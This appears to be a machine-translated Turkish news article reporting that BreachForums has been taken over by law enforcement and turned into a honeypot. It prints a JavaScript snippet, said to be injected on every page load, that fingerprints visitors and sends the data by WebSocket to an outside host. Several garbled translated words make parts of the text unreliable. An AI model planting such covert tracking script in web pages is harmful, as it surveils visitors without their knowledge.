Tehdit oyuncusu kolektif Shinyhunters yakın zamanda, çalıntı kimlik bilgileri ve sızıntı verileri için en üretken üreme alanlarından biri olan Breachforums’un uluslararası kolluk kuvvetleri tarafından komuta edildiğini duyurdu.
Shinyhunters’dan Shiny’e göre, sitenin “Hollow”, “Shinyhunters” ve orijinal “kurucu” hesapları da dahil olmak üzere idari kontrolleri şimdi FBI ile koordineli olarak Fransız yetkililerin gözetiminde faaliyet gösteriyor.
İlk raporlar, foruma giriş yapmaya çalışan kullanıcıların bilmeden kimlik bilgilerini ve cihaz parmak izlerini suç aktörleri izlemek ve tanımlamak için tasarlanmış sofistike bir balkota gönderdiğini göstermektedir.
.webp)
Breachforums ilk olarak birkaç kaçak kaçak paylaşım platformunun halefi olarak ortaya çıktı, şifreli bir mesajlaşma sistemi ve ihlal edilen veritabanlarını otomatik olarak hasat etmek için yerleşik kazıma araçları sunarak hızla siber suçluları çekti.
Birincil saldırı vektörleri, kötü güvenli ortak sitelere karşı SQL enjeksiyon istismarlarını ve kimlik avı kitlerini dağıtan özel bir botnet içeriyordu.
Hackmanac analistleri, Temmuz 2025 gibi erken saatlerde oturum açma yönlendirmelerine gömülü anormal trafik modelleri ve enjeksiyon yüklerini belirledi ve forumu kendi kullanıcı tabanı için bir tuzağa dönüştürmek için site değişikliklerinin devam ettiğini gösteriyor.
Yeraltı ekonomisi üzerindeki etkisi derindir: veri satıcıları ve sızıntıları artık hassas bilgileri paylaşmak veya satın almak konusunda isteksizdir, maruz kalma korkusu.
Honeypot yakalamaları cihaz parmak izleri, IP coğrafi konumunda ve saldırı araçlarında eyleme geçirilebilir zeka sağladığı için, kimlik bilgisi doldurma kampanyalarının kurbanları hedeflenen icra operasyonlarında bir artış görebilir.
Girişim, siber suç ekosistemlerini bozmak için aldatma işlemlerinden yararlanan kolluk kuvvetlerinin daha geniş bir eğilimini yansıtıyor.
Enfeksiyon mekanizması ve balkospot yükleri
BreachForums’un dönüşümüne daha derinlemesine giren Honeypot, sunulan her sayfaya gizli bir javascript snippet’ini enjekte eder.
.webp)
Bu komut dosyası, şifrelenmiş bir WebSocket kanalı aracılığıyla oturum bilgilerini sessizce parmak izleri ve söndürür:-
// Figure 1: honeypot_architecture.png
(function() {
const socket = new WebSocket("wss://leaktrack.law/honeypot");
socket.onopen = () => {
const fingerprint = {
ua: navigator.userAgent,
plugins: navigator.plugins.length,
time: Date.now()
};
socket. Send(btoa(JSON.stringify(fingerprint)));
};
socket.onmessage = (evt) => {
console.log("Honeypot response:", atob(evt.data));
};
})();Bu yük, sayfa yüklenmesi üzerine, kullanıcı ajanı dizeleri, yüklü eklenti sayıları ve hassas zaman damgaları toplama üzerine yürütülür.
Ek kalıcılık taktikleri, her beş dakikada bir yeniden bağlanan dinamik olarak üretilen IFrame gömürlerini içerir ve pasif ziyaretçilerin bile sürekli olarak izlenmesini sağlar.
Bu tasarım sayesinde yetkililer, giriş girişimlerini gerçek dünya kimlikleriyle ilişkilendirebilir ve ihlalleri etkili bir şekilde dijital bir dragnet’e dönüştürebilir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.